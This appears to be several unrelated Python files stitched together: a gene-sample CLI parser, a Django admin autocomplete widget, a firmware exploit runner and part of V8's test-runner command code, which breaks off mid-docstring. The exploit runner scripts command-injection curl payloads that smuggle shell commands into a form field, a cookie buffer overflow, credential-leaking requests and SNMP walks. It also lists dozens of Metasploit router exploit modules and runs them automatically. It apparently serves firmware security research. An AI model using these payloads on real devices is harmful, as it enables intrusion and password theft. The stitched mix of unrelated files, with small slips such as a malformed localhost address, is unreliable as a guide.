from declarative_parser.types import Slice, one_of, Indices, dsv, Range
from declarative_parser.constructor_parser import ConstructorParser
class SampleCollectionFactory(Parser):
"""Provide {parser_name} samples. Requires a file (or files) with samples.
The files should come in Delimiter Separated Values format
(like .csv or .tsv). The default delimiter is a tab character.
The first column of each file should contain gene identifiers.
To use only a subset of samples from files(s) specify column numbers
(--columns) or sample names (--samples) of desired samples.
"""
files = Argument(
type=argparse.FileType('r'),
# at least one file is always required
nargs='+',
optional=False
)
name = Argument(help='Your custom name for this set of samples.')
samples = Argument(
type=dsv(str),
nargs='*',
as_many_as=files,
help='Names of samples (columns) to be extracted from the file. '
'Sample names are determined from the first non-empty row. '
'Use a comma to separate samples. '
'Samples for each of files should be separated by space.'
)
columns = Argument(
# we want to handle either ":4", "5:" or even "1,2,3"
type=one_of(Slice, Indices, Range),
# user may (but do not have to) specify columns
# to be extracted from given file(s).
nargs='*',
as_many_as=files,
help='Columns to be extracted from files: '
'either a comma delimited list of 0-based numbers (e.g. 0,2,3) '
'or a range defined using Python slice notation (e.g. 3:10). '
'Columns for each of files should be separated by space.'
)
delimiter = Argument(
default='\t',
help='Delimiter of the provided file(s). Default: tabulation mark.'
)
header = Argument(
nargs='*',
type=one_of(int, str),
as_many_as=files,
default=lambda file_object: 0,
help='Defines how the sample names should be created. '
'Provide a number to specify which line should be used '
'to extract names for samples. Please remember that '
'empty lines will be skipped. If your file has no row '
'with sample names, provide a string to be used as a '
'prefix for naming consecutive samples. '
'For example, `--header cancer` will lead to naming '
'all relevant samples like: cancer_1, cancer_2, etc. '
'Default: create sample names from first non-empty '
'line in the file.'
)
description_column = Argument(
short='d',
action='store_true',
help='Enable this switch, if there is a column with columns '
'descriptions (the column has to be on position two, '
'i.e. immediately after gene identifiers). By default '
'it is assumed that there is no such column.'
)
constructors_by_ext = {
'tsv': SampleCollection.from_file,
'csv': SampleCollection.from_csv_file,
'gct': SampleCollection.from_gct_file
}
deduce_format = Argument(
type=bool,
default=True,
help='Deduce file format and automatically set the best '
'parsing parameters. The format will be inferred from '
'extension of the provided file(s). '
f'Following formats are supported: {constructors_by_ext}. '
'Default: true.'
)
def produce(self, unknown_args=None):
opts = self.namespace
name = opts.name or self.name
if opts.files:
# load all files
sample_collections = []
if callable(opts.header):
opts.header = [opts.header(f) for f in opts.files]
for i, file_obj in enumerate(opts.files):
use_header = isinstance(opts.header[i], int)
constructor = SampleCollection.from_file
if opts.deduce_format:
extension = Path(file_obj.name).suffix[1:]
if extension in self.constructors_by_ext:
constructor = self.constructors_by_ext[extension]
sample_collections.append(
constructor(
f'Sample collection, part {i} of {name}',
file_obj,
columns_selector=opts.columns[i].get_iterator if opts.columns else None,
samples=opts.samples[i] if opts.samples else None,
reverse_selection=getattr(opts, 'reverse', False),
delimiter=opts.delimiter,
header_line=opts.header[i] if use_header else None,
use_header=use_header,
prefix=opts.header[i] if not use_header else None,
description_column=opts.description_column
)
)
opts.sample_collection = sum(sample_collections, SampleCollection(name))
return opts
class SingleFileExperimentFactory(Parser):
"""Provide both: case and control samples from a single file.
This is just a shortcut for specifying the same file for both:
case and control samples sets. You have to provide --case or
--control (or both) to specify which columns contain controls.
If you specify only one of --case and --control, it will be
assumed that all other columns should be used for the other
set of samples (if you use `--case 0,1,2` and your file has
five columns with samples, then columns three and four will
be used to create control samples).
To enable more advanced features, please use `control`&`case`
options (instead of the currently selected `data` sub-parser).
"""
# exactly one file is required
files = Argument(
type=argparse.FileType('r'),
nargs=1, # transforms result into a single-element list
optional=False,
help='file with samples for both control and cases.'
)
case = Argument(
type=one_of(Slice, Indices, Range),
nargs=1,
help='columns from which case samples should be extracted.'
)
control = Argument(
type=one_of(Slice, Indices, Range),
nargs=1,
help='columns from which control samples should be extracted.',
)
def produce(self, unknown_args=None):
opts = self.namespace
def produce_collection_of_samples(created_group, other_group):
reverse = hasattr(opts, 'reverse_' + created_group)
get_columns_from = created_group
if reverse:
get_columns_from = other_group
return SampleCollectionFactory(
name=created_group,
files=opts.files,
columns=getattr(opts, get_columns_from),
reverse=reverse
).produce()
if opts.files:
if not (opts.case and opts.control):
if opts.case:
opts.reverse_control = True
elif opts.control:
opts.reverse_case = True
else:
raise ValueError(
'Neither --case nor --control provided: '
'please specify which columns should be used as control '
'and which should be used as the case.'
)
collections = {
'control': produce_collection_of_samples('control', 'case')
}
# reuse the same file(s)
for f in opts.files:
f.seek(0)
collections['case'] = produce_collection_of_samples('case', 'control')
for name, sample_collection in collections.items():
setattr(opts, name, sample_collection)
return opts
class CLIExperiment(Parser):
"""Use both: case and control or data to create an Experiment."""
__pull_to_namespace_above__ = True
__skip_if_absent__ = False
control = SampleCollectionFactory()
case = SampleCollectionFactory()
data = SingleFileExperimentFactory()
def produce(self, unknown_args=None):
opts = self.namespace
if opts.data:
if opts.control or opts.case:
raise ValueError('Cannot handle data and case/control at once')
opts.case = self.data.namespace.case
opts.control = self.data.namespace.control
elif opts.case and opts.control:
# that's nice :)
pass
elif opts.case:
raise ValueError('Control has not been provided!')
elif opts.control:
raise ValueError('Case has not been provided!')
else:
raise ValueError('Neither data nor (case & control) have been provided!')
del opts.data
opts.experiment = Experiment(opts.case.sample_collection, opts.control.sample_collection)
return opts
class CLI(Parser):
"""The main parser, the one exposed directly to the user."""
method_name = Argument(choices=Method.members, name='method', optional=False)
experiment = CLIExperiment()
__parsing_order__ = 'breadth-first'
@staticmethod
def create_method(name):
# first - take an appropriate method class
method = Method.members[name]
# initialize parser for this method
# (different methods require different arguments)
method_parser = ConstructorParser(constructor=method)
return method_parser
def parse_args(self, args):
help_args = {'-h', '--help'}
if help_args.intersection(args):
args_without_help = [
arg
for arg in args
if arg not in help_args
]
if len(args_without_help) != 0:
name = args_without_help[0]
# in case of a conflict, help for both (for a sub-parser
# and for a method) should be displayed.
methods = {
name: ConstructorParser(constructor=method)
for name, method in Method.members.items()
}
def match_parser(subparsers):
return subparsers.get(name, None)
all_subparsers = [methods, self.subparsers, self.lifted_parsers]
for parser in filter(bool, map(match_parser, all_subparsers)):
return parser.parse_args(args_without_help[1:] + ['-h'])
return super().parse_args(args)
def produce(self, unknown_args):
options = self.namespace
method_parser = self.create_method(options.method)
# parse arguments
method_options, remaining_unknown_args = method_parser.parse_known_args(unknown_args)
for argument in unknown_args[:]:
if argument not in remaining_unknown_args:
unknown_args.remove(argument)
# and initialize the method with these arguments
options.method = method_parser.constructor(**vars(method_options))
return options
|
|
#
# Autocomplete feature for admin panel
#
# Most of the code has been written by Jannis Leidel:
# http://jannisleidel.com/2008/11/autocomplete-form-widget-foreignkey-model-fields/
#
# to_string_function, Satchmo adaptation and some comments added by emes (Michal Salaban)
#
from django import forms
from django.db import models
from django.db.models.query import QuerySet
from django.conf import settings
from django.contrib import admin
from django.http import HttpResponse, HttpResponseNotFound
from django.utils.encoding import smart_str
from django.utils.safestring import mark_safe
from django.utils.text import truncate_words
from django.utils.functional import update_wrapper
# Commenting out for Django 1.3 compatibility
# TODO: Need to find long term solution
#from django.contrib.admin.templatetags.admin_static import static
import operator
class ForeignKeySearchInput(forms.HiddenInput):
"""
A Widget for displaying ForeignKeys in an autocomplete search input
    instead of in a <select> box.
"""
    # staticmethod keeps the class-level default from being bound to the instance
    to_string_function = staticmethod(lambda s: truncate_words(s, 14))
class Media:
css = {
'all': ('css/jquery.autocomplete.css',)
}
js = (
# The js/jquery.js script is referenced in admin/base_site.html template.
# Requesting it here again would reset all the plugins loaded afterwards.
'js/jquery.bgiframe.js',
'js/jquery.ajaxQueue.js',
'js/jquery.autocomplete.js'
)
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return self.to_string_function(obj)
def __init__(self, rel, search_fields, to_string_function, attrs=None):
self.rel = rel
self.search_fields = search_fields
if to_string_function: self.to_string_function = to_string_function
super(ForeignKeySearchInput, self).__init__(attrs)
def render(self, name, value, attrs=None):
if attrs is None:
attrs = {}
rendered = super(ForeignKeySearchInput, self).render(name, value, attrs)
if value:
label = self.label_for_value(value)
else:
label = u''
return rendered + mark_safe(u'''
<style type="text/css" media="screen">
#lookup_%(name)s {
padding-right:16px;
background: url(
%(admin_media_prefix)simg/admin/selector-search.gif
) no-repeat right;
}
#del_%(name)s {
display: none;
}
</style>
<input type="text" id="lookup_%(name)s" value="%(label)s"/>
<a href="#" id="del_%(name)s">
<img src="%(admin_media_prefix)simg/admin/icon_deletelink.gif" />
</a>
<script type="text/javascript">
var lookup = $('#lookup_%(name)s')
if (lookup.val()) {
$('#del_%(name)s').show()
}
lookup.attr('size', Math.max(40, lookup.attr('value').length))
lookup.autocomplete('../search/', {
formatResult: function(data){ return $('<div />').html(data[0]).text(); },
extraParams: {
search_fields: '%(search_fields)s',
app_label: '%(app_label)s',
model_name: '%(model_name)s'
}
}).result(function(event, data, formatted) {
if (data) {
$('#id_%(name)s').val(data[1]);
$('#del_%(name)s').show();
}
});
$('#del_%(name)s').click(function(ele, event) {
$('#id_%(name)s').val('');
$('#del_%(name)s').hide();
$('#lookup_%(name)s').val('');
});
</script>
''') % {
'search_fields': ','.join(self.search_fields),
'admin_media_prefix': settings.ADMIN_MEDIA_PREFIX,
'model_name': self.rel.to._meta.module_name,
'app_label': self.rel.to._meta.app_label,
'label': label,
'name': name,
}
class AutocompleteAdmin(admin.ModelAdmin):
"""Admin class for models using the autocomplete feature.
There are two additional fields:
- related_search_fields: defines fields of managed model that
have to be represented by autocomplete input, together with
a list of target model fields that have to be searched for
input string,
- related_string_functions: contains optional functions which
take target model instance as only argument and return string
representation. By default __unicode__() method of target
object is used.
"""
related_search_fields = {}
related_string_functions = {}
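    # Example (sketch) of a subclass wiring these up; the model and field
    # names are hypothetical:
    #   class BookAdmin(AutocompleteAdmin):
    #       related_search_fields = {'author': ('^last_name', 'first_name')}
    #       related_string_functions = {'author': lambda obj: obj.last_name}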
def __call__(self, request, url):
# This is deprecated interface and will be dropped in Django 1.3.
# Since the version 1.1, Django uses get_urls() method below.
if url is None:
pass
elif url == 'search':
return self.search(request)
return super(AutocompleteAdmin, self).__call__(request, url)
def get_urls(self):
from django.conf.urls.defaults import url
def wrap(view):
# This is needed to secure the view so that only admin users can access
def wrapper(*args, **kwargs):
return self.admin_site.admin_view(view)(*args, **kwargs)
return update_wrapper(wrapper, view)
patterns = super(AutocompleteAdmin, self).get_urls()
info = self.admin_site.name, self.model._meta.app_label, self.model._meta.module_name
patterns.insert(
-1, # insert just before (.+) rule (see django.contrib.admin.options.ModelAdmin.get_urls)
url(r'^search/$',
wrap(self.search),
name='%sadmin_%s_%s_search' % info
)
)
return patterns
def search(self, request):
"""
Searches in the fields of the given related model and returns the
result as a simple string to be used by the jQuery Autocomplete plugin
"""
query = request.GET.get('q', None)
app_label = request.GET.get('app_label', None)
model_name = request.GET.get('model_name', None)
search_fields = request.GET.get('search_fields', None)
try:
to_string_function = self.related_string_functions[model_name]
except KeyError:
to_string_function = lambda x: x.__unicode__()
if search_fields and app_label and model_name and query:
def construct_search(field_name):
# use different lookup methods depending on the notation
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
elif field_name.startswith('@'):
return "%s__search" % field_name[1:]
else:
return "%s__icontains" % field_name
model = models.get_model(app_label, model_name)
qs = model._default_manager.all()
for bit in query.split():
or_queries = [models.Q(**{construct_search(
smart_str(field_name)): smart_str(bit)})
for field_name in search_fields.split(',')]
other_qs = QuerySet(model)
other_qs.dup_select_related(qs)
other_qs = other_qs.filter(reduce(operator.or_, or_queries))
qs = qs & other_qs
data = ''.join([u'%s|%s\n' % (to_string_function(f), f.pk) for f in qs])
return HttpResponse(data)
return HttpResponseNotFound()
def formfield_for_dbfield(self, db_field, **kwargs):
"""
Overrides the default widget for Foreignkey fields if they are
specified in the related_search_fields class attribute.
"""
if isinstance(db_field, models.ForeignKey) and \
db_field.name in self.related_search_fields:
kwargs['widget'] = ForeignKeySearchInput(
db_field.rel,
self.related_search_fields[db_field.name],
self.related_string_functions.get(db_field.name),
)
field = super(AutocompleteAdmin, self).formfield_for_dbfield(db_field, **kwargs)
return field
|
|
#!/usr/bin/env python
import os
import sys
import getopt
import subprocess
import contextlib
import psycopg2
SHELL_EXPLOITS = {
200 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF1;®info=1&writeData=Submit\" http://%(target)s/boardData102.php", "grep -qs \"DEADBEEF1\" qemu.serial"), # CVE-2016-1555
201 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF2;®info=1&writeData=Submit\" http://%(target)s/boardData103.php", "grep -qs \"DEADBEEF2\" qemu.serial"), # CVE-2016-1555
202 : ("curl -L --max-redir 0 -m 5 -s -f http://%(target)s/ROM-0", ""), # https://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/
203 : ("curl -L --max-redir 0 -m 5 -s -f -b dlink_uid=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA http://%(target)s/session_login.php", "grep -qs \"BadVA : 41414141\" qemu.serial"), # CVE-2016-1558
204 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF3;®info=1&writeData=Submit\" http://%(target)s/boardDataJP.php", "grep -qs \"DEADBEEF3\" qemu.serial"), # CVE-2016-1555
205 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF4;®info=1&writeData=Submit\" http://%(target)s/boardDataNA.php", "grep -qs \"DEADBEEF4\" qemu.serial"), # CVE-2016-1555
206 : ("curl -L --max-redir 0 -m 5 -s -f -X POST -d \"macAddress=000000000000;cat DEADBEEF5;®info=1&writeData=Submit\" http://%(target)s/boardDataWW.php", "grep -qs \"DEADBEEF5\" qemu.serial"), # CVE-2016-1555
207 : ("curl -L --max-redir 0 -m 5 -s -f http://%(target)s/getBoardConfig.php", "grep -qs -e \"WPS PIN\" -e \"PASSPHRASE\" %(output)s"), # CVE-2016-1556
# 208 : ("curl -L --max-redir 0 -m 5 -s -f \"http://%(target)s/mfgwrite.php?product=;cat DEADBEEF6\"", "grep -qs \"DEADBEEF6\" qemu.serial"),
209 : ("snmpwalk -v2c -c public %(target)s .iso", "grep -qs \".2.1.3.3.2.1.1.4\" %(output)s"), # CVE-2016-1559
210 : ("snmpwalk -v2c -c public %(target)s .iso", "grep -qs \".4.1.1.1\" %(output)s "), # CVE-2016-1559
211 : ("snmpwalk -v2c -c public %(target)s iso.3.6.1.4.1.4526.100.7.8.1.5", ""), # CVE-2016-1557
212 : ("snmpwalk -v2c -c public %(target)s iso.3.6.1.4.1.4526.100.7.9.1.5", ""), # CVE-2016-1557
213 : ("snmpwalk -v2c -c public %(target)s iso.3.6.1.4.1.4526.100.7.9.1.7", ""), # CVE-2016-1557
214 : ("snmpwalk -v2c -c public %(target)s iso.3.6.1.4.1.4526.100.7.10.1.7", ""), # CVE-2016-1557
# 215 : ("curl -L --max-redir 0 -m 5 -s -f http://%(target)s/userRpmNatDebugRpm26525557/linux_cmdline.html", ""), # http://websec.ca/advisories/view/root-shell-tplink-wdr740
}
METASPLOIT_EXPLOITS = {
0 : "use exploits/linux/http/airties_login_cgi_bof",
1 : "use exploits/linux/http/belkin_login_bof",
2 : "use exploits/linux/http/ddwrt_cgibin_exec",
3 : "use exploits/linux/http/dlink_authentication_cgi_bof",
4 : "use exploits/linux/http/dlink_command_php_exec_noauth",
5 : "use exploits/linux/http/dlink_diagnostic_exec_noauth",
6 : "use exploits/linux/http/dlink_dir300_exec_telnet",
7 : "use exploits/linux/http/dlink_dir605l_captcha_bof",
8 : "use exploits/linux/http/dlink_dir615_up_exec",
9 : "use exploits/linux/http/dlink_dspw110_cookie_noauth_exec",
10 : "use exploits/linux/http/dlink_dspw215_info_cgi_bof",
11 : "use exploits/linux/http/dlink_hedwig_cgi_bof",
12 : "use exploits/linux/http/dlink_hnap_bof",
13 : "use exploits/linux/http/dlink_hnap_header_exec_noauth",
14 : "use exploits/linux/http/dlink_upnp_exec_noauth",
# 15 : "use exploits/router/dreambox_openpli_shell",
16 : "use exploits/linux/http/fritzbox_echo_exec",
17 : "use exploits/linux/http/linksys_apply_cgi",
# 18 : "use exploits/linux/http/linksys_e1500_apply_exec",
19 : "use exploits/linux/http/linksys_themoon_exec",
# 20 : "use exploits/linux/http/linksys_wrt54gl_apply_exec",
# 21 : "use exploits/linux/http/linksys_wrt110_cmd_exec",
# 22 : "use exploits/linux/http/linksys_wrt160nv2_apply_exec",
23 : "use exploits/linux/http/multi_ncc_ping_exec",
24 : "use exploits/linux/http/netgear_dgn1000b_setup_exec",
# 25 : "use exploits/linux/http/netgear_dgn2200b_pppoe_exec",
26 : "use exploits/linux/http/netgear_readynas_exec",
27 : "use exploits/linux/http/realtek_miniigd_upnp_exec_noauth",
28 : "use exploits/linux/http/seagate_nas_php_exec_noauth",
29 : "use exploits/linux/misc/sercomm_exec",
30 : "use exploits/linux/upnp/dlink_upnp_msearch_exec",
31 : "use exploits/linux/upnp/miniupnpd_soap_bof",
32 : "use exploits/multi/http/cisco_dcnm_upload",
33 : "use exploits/multi/upnp/libupnp_ssdp_overflow",
# 34 : "use exploits/unix/dhcp/bash_environment",
# 35 : "use auxiliary/router/cisco_secure_acs_bypass",
36 : "use auxiliary/admin/cisco/vpn_3000_ftp_bypass",
37 : "use auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss",
38 : "use auxiliary/admin/http/dlink_dir_300_600_exec_noauth",
39 : "use auxiliary/admin/http/dlink_dir_645_password_extractor",
40 : "use auxiliary/admin/http/dlink_dsl320b_password_extractor",
41 : "use auxiliary/admin/http/intersil_pass_reset",
# 42 : "use auxiliary/admin/http/linksys_e1500_e2500_exec",
43 : "use exploits/router/linksys_tmunblock_admin_reset_bof",
# 44 : "use auxiliary/admin/http/linksys_wrt54gl_exec",
45 : "use auxiliary/admin/http/netgear_soap_password_extractor",
46 : "use auxiliary/admin/http/zyxel_admin_password_extractor",
47 : "use auxiliary/admin/misc/sercomm_dump_config",
48 : "use auxiliary/admin/motorola/wr850g_cred",
49 : "use auxiliary/admin/vxworks/apple_airport_extreme_password",
50 : "use auxiliary/admin/vxworks/dlink_i2eye_autoanswer",
51 : "use auxiliary/admin/vxworks/wdbrpc_memory_dump",
52 : "use auxiliary/admin/vxworks/wdbrpc_reboot",
53 : "use auxiliary/dos/cisco/ios_http_percentpercent",
54 : "use auxiliary/dos/dhcp/isc_dhcpd_clientid\nset RIP %(target)s",
# 55 : "use auxiliary/router/ntpd_reserved_dos",
56 : "use auxiliary/dos/upnp/miniupnpd_dos",
57 : "use auxiliary/scanner/http/cisco_ios_auth_bypass",
58 : "use auxiliary/scanner/http/cisco_nac_manager_traversal",
59 : "use auxiliary/scanner/http/dlink_user_agent_backdoor",
60 : "use auxiliary/scanner/http/linksys_e1500_traversal",
61 : "use auxiliary/scanner/http/goahead_traversal",
62 : "use auxiliary/scanner/http/litespeed_source_disclosure\nset PATH_SAVE /tmp/",
63 : "use auxiliary/scanner/http/netgear_sph200d_traversal",
64 : "use auxiliary/scanner/ssl/openssl_ccs",
65 : "use auxiliary/scanner/ssl/openssl_heartbleed",
66 : "use auxiliary/scanner/http/allegro_rompager_misfortune_cookie",
67 : "use auxiliary/dos/dns/bind_tkey",
68 : "use exploits/linux/http/synology_dsm_sliceupload_exec_noauth",
69 : "use auxiliary/scanner/snmp/sbg6580_enum",
70 : "use auxiliary/scanner/snmp/arris_dg950",
71 : "use exploits/linux/http/dlink_hnap_login_bof", # Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow
72 : "use exploits/linux/http/netgear_r7000_cgibin_exec", # Netgear R7000 and R6400 cgi-bin Command Injection, import on 2017/03/20
73 : "use exploits/linux/http/netgear_wnr2000_rce", # NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow, import on 2017/03/27
}
# this attempts to default to stdout if an output file is not provided, but may be buggy
@contextlib.contextmanager
def smart_open(filename, mode):
if filename:
f = open(filename, mode)
else:
f = sys.stdout
try:
yield f
finally:
if f != sys.stdout:
f.close()
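# Example (hypothetical filename): with a name, logs go to that file; with a
# falsy filename they go to stdout, which is left open on exit:
#
#     with smart_open("scan.log", "w") as f:
#         f.write("starting scan\n")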
def exploit_metasploit(target, eid, outfile=None):
    cmd = METASPLOIT_EXPLOITS[eid] % {'target': target}
    if not outfile:
        return cmd + "\nexploit -z\n"
    return ("spool " + outfile % {'exploit': eid} + "\n" + cmd +
            "\nexploit -z\nspool off\nsessions -K\n")
def exploit_shell(target, eid, outfile=None):
print("Executing shell command...")
# create log file for this shell command execution
if outfile:
outfile = outfile % {'exploit':eid}
with smart_open(outfile, 'w') as f:
ret = subprocess.run(SHELL_EXPLOITS[eid][0] % {'target': target},
stderr=f, stdout=f, shell=True).returncode
# always run verification command if available; do not attempt early
# termination if the first command appears to fail
# this fixes e.g. 203, which crashes the HTTP server and causes curl to
# return CURLE_GOT_NOTHING (52)
if SHELL_EXPLOITS[eid][1]:
ret = subprocess.run(SHELL_EXPLOITS[eid][1] % \
{'target':target, 'output':outfile}, stderr=f, stdout=f, shell=True).returncode
f.write("\nResult: %d" % ret)
def scoring(outfile):
dbh = psycopg2.connect(database = "exploit", user = "firmadyne",
password = "firmadyne", host = "127.0.01")
cur = dbh.cursor()
print("\n===== Exploited result =====")
exploited = []
for eid in list(METASPLOIT_EXPLOITS.keys()):
cmd = "cat " + outfile % {'exploit' : eid} + " | grep -q +"
rcode = subprocess.call(cmd, shell = True)
if rcode != 1: # exploited!
exploited.append(eid)
if len(exploited) == 0:
print("None")
else:
score = 0
for eid in exploited:
query = """SELECT * FROM module WHERE id = %(eid)s"""
cur.execute(query, {'eid' : eid})
x = cur.fetchone()[1]
print("Exploited module: %s" % x)
query = """SELECT * FROM score WHERE id = %(eid)s"""
cur.execute(query, {'eid' : eid})
y = cur.fetchone()
if y[2] is None:
rank = y[1]
if rank == "Excellent":
s = 10.0
elif rank == "Great":
s = 8.6
elif rank == "Good":
s = 7.1
elif rank == "Normal":
s = 5.7
elif rank == "Average":
s = 4.3
elif rank == "Low":
s = 2.9
elif rank == "Manual":
s = 1.4
else:
s = float(y[2])
print("Score: %.1f" % s)
score = score + (10 - score) * s / 10
print("------------------------------")
print("Total Score: %.2f" % score)
print("============================")
def process(target, exploits, outfile=None):
cmd = "setg RHOST %(target)s\nsetg RHOSTS %(target)s\n\n" % \
{'target': target}
# not great performance, because we will wait until all exploits have
# been processed before starting metasploit with the script
for e in exploits:
if e in METASPLOIT_EXPLOITS:
cmd += exploit_metasploit(target, e, outfile) + "\n"
elif e in SHELL_EXPLOITS:
exploit_shell(target, e, outfile)
else:
print("Unrecognized exploit: %d" % e)
cmd += "quit"
# write metasploit script to attempt exploits
print("Writing script.rc...")
with open("script.rc", 'w') as f:
f.write(cmd)
# create log file for all metasploit exploit execution
if outfile:
logfile = outfile % {'exploit': "metasploit"}
else:
logfile = "/dev/stdout"
print("Executing metasploit command...")
with smart_open(logfile, 'w') as f:
ret = subprocess.run(['/bin/sh', '-c', 'msfconsole -qr script.rc'], stderr=f, stdout=f).returncode
f.write("\nResult: %d" % ret)
# print the exploited result and scoring
scoring(outfile)
def main():
exploits = []
outfile = None
    if len(sys.argv) != 7:
        print("Usage: ./runExploits.py -t <target-ip> -o <output-dir> -e <exploits>")
        print("Note: <exploits> can be 'all' or a list of exploits separated by ','")
        exit(1)
opts, argv = getopt.getopt(sys.argv[1:], 'e:t:o:')
for k, v in opts:
if k == '-e':
if v == 'all':
                exploits = list(METASPLOIT_EXPLOITS.keys()) + list(SHELL_EXPLOITS.keys())
else:
exploits = [int(x) for x in v.split(',')]
if k == '-t':
target = v
if k == '-o':
if not os.path.isdir(v):
if os.path.exists(v):
os.remove(v)
                os.makedirs(v, 0o755)
outfile = v + "/%(exploit)s.log"
process(target, exploits, outfile)
if __name__ == "__main__":
main()
|
|
# Copyright 2017 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import signal
import subprocess
import sys
import threading
import time
from ..local.android import (
android_driver, CommandFailedException, TimeoutException)
from ..local import utils
from ..objects import output
BASE_DIR = os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), '..' , '..', '..'))
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def setup_testing():
"""For testing only: We use threading under the hood instead of
multiprocessing to make coverage work. Signal handling is only supported
in the main thread, so we disable it for testing.
"""
signal.signal = lambda *_: None
class AbortException(Exception):
"""Indicates early abort on SIGINT, SIGTERM or internal hard timeout."""
pass
class BaseCommand(object):
def __init__(self, shell, args=None, cmd_prefix=None, timeout=60, env=None,
verbose=False, resources_func=None):
"""Initialize the command.
Args:
shell: The name of the executable (e.g. d8).
args: List of args to pass to the executable.
cmd_prefix: Prefix of command (e.g. a wrapper script).
timeout: Timeout in seconds.
env: Environment dict for execution.
verbose: Print additional output.
resources_func: Callable, returning all test files needed by this command.
"""
    assert timeout > 0
self.shell = shell
self.args = args or []
self.cmd_prefix = cmd_prefix or []
self.timeout = timeout
self.env = env or {}
self.verbose = verbose
def execute(self):
if self.verbose:
print '# %s' % self
process = self._start_process()
# Variable to communicate with the signal handler.
    abort_occurred = [False]
def handler(signum, frame):
      self._abort(process, abort_occurred)
signal.signal(signal.SIGTERM, handler)
# Variable to communicate with the timer.
    timeout_occurred = [False]
timer = threading.Timer(
        self.timeout, self._abort, [process, timeout_occurred])
timer.start()
start_time = time.time()
stdout, stderr = process.communicate()
duration = time.time() - start_time
timer.cancel()
    if abort_occurred[0]:
raise AbortException()
return output.Output(
process.returncode,
        timeout_occurred[0],
stdout.decode('utf-8', 'replace').encode('utf-8'),
stderr.decode('utf-8', 'replace').encode('utf-8'),
process.pid,
duration
)
def _start_process(self):
try:
return subprocess.Popen(
args=self._get_popen_args(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=self._get_env(),
)
except Exception as e:
sys.stderr.write('Error executing: %s\n' % self)
raise e
def _get_popen_args(self):
return self._to_args_list()
def _get_env(self):
env = os.environ.copy()
env.update(self.env)
# GTest shard information is read by the V8 tests runner. Make sure it
# doesn't leak into the execution of gtests we're wrapping. Those might
# otherwise apply a second level of sharding and as a result skip tests.
env.pop('GTEST_TOTAL_SHARDS', None)
env.pop('GTEST_SHARD_INDEX', None)
return env
def _kill_process(self, process):
raise NotImplementedError()
def _abort(self, process, abort_called):
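    # Record that we initiated the kill (hard timeout or SIGTERM) so that
    # execute() can tell an abort from a normal exit, then terminate the
    # process.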
abort_called[0] = True
try:
self._kill_process(process)
except OSError:
pass
def __str__(self):
return self.to_string()
def to_string(self, relative=False):
def escape(part):
# Escape spaces. We may need to escape more characters for this to work
# properly.
if ' ' in part:
return '"%s"' % part
return part
parts = map(escape, self._to_args_list())
cmd = ' '.join(parts)
if relative:
cmd = cmd.replace(os.getcwd() + os.sep, '')
return cmd
def _to_args_list(self):
return self.cmd_prefix + [self.shell] + self.args
class PosixCommand(BaseCommand):
def _kill_process(self, process):
process.kill()
class WindowsCommand(BaseCommand):
def _start_process(self, **kwargs):
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
def set_error_mode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = (
ctypes.windll.kernel32.SetErrorMode(mode)) #@UndefinedVariable
except ImportError:
pass
return prev_error_mode
error_mode = SEM_NOGPFAULTERRORBOX
prev_error_mode = set_error_mode(error_mode)
set_error_mode(error_mode | prev_error_mode)
try:
return super(WindowsCommand, self)._start_process(**kwargs)
finally:
if prev_error_mode != SEM_INVALID_VALUE:
set_error_mode(prev_error_mode)
def _get_popen_args(self):
return subprocess.list2cmdline(self._to_args_list())
def _kill_process(self, process):
if self.verbose:
print 'Attempting to kill process %d' % process.pid
sys.stdout.flush()
tk = subprocess.Popen(
'taskkill /T /F /PID %d' % process.pid,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout, stderr = tk.communicate()
if self.verbose:
print 'Taskkill results for %d' % process.pid
print stdout
print stderr
print 'Return code: %d' % tk.returncode
sys.stdout.flush()
class AndroidCommand(BaseCommand):
def __init__(self, shell, args=None, cmd_prefix=None, timeout=60, env=None,
verbose=False, resources_func=None):
"""Initialize the command and all files that need to be pushed to the
Android device.
"""
self.shell_name = os.path.basename(shell)
self.shell_dir = os.path.dirname(shell)
self.files_to_push = (resources_func or (lambda: []))()
# Make all paths in arguments relative and also prepare files from arguments
# for pushing to the device.
rel_args = []
find_path_re = re.compile(r'.*(%s/[^\'"]+).*' % re.escape(BASE_DIR))
for arg in (args or []):
match = find_path_re.match(arg)
if match:
self.files_to_push.append(match.group(1))
rel_args.append(
re.sub(r'(.*)%s/(.*)' % re.escape(BASE_DIR), r'\1\2', arg))
super(AndroidCommand, self).__init__(
shell, args=rel_args, cmd_prefix=cmd_prefix, timeout=timeout, env=env,
verbose=verbose)
def execute(self, **additional_popen_kwargs):
"""Execute the command on the device.
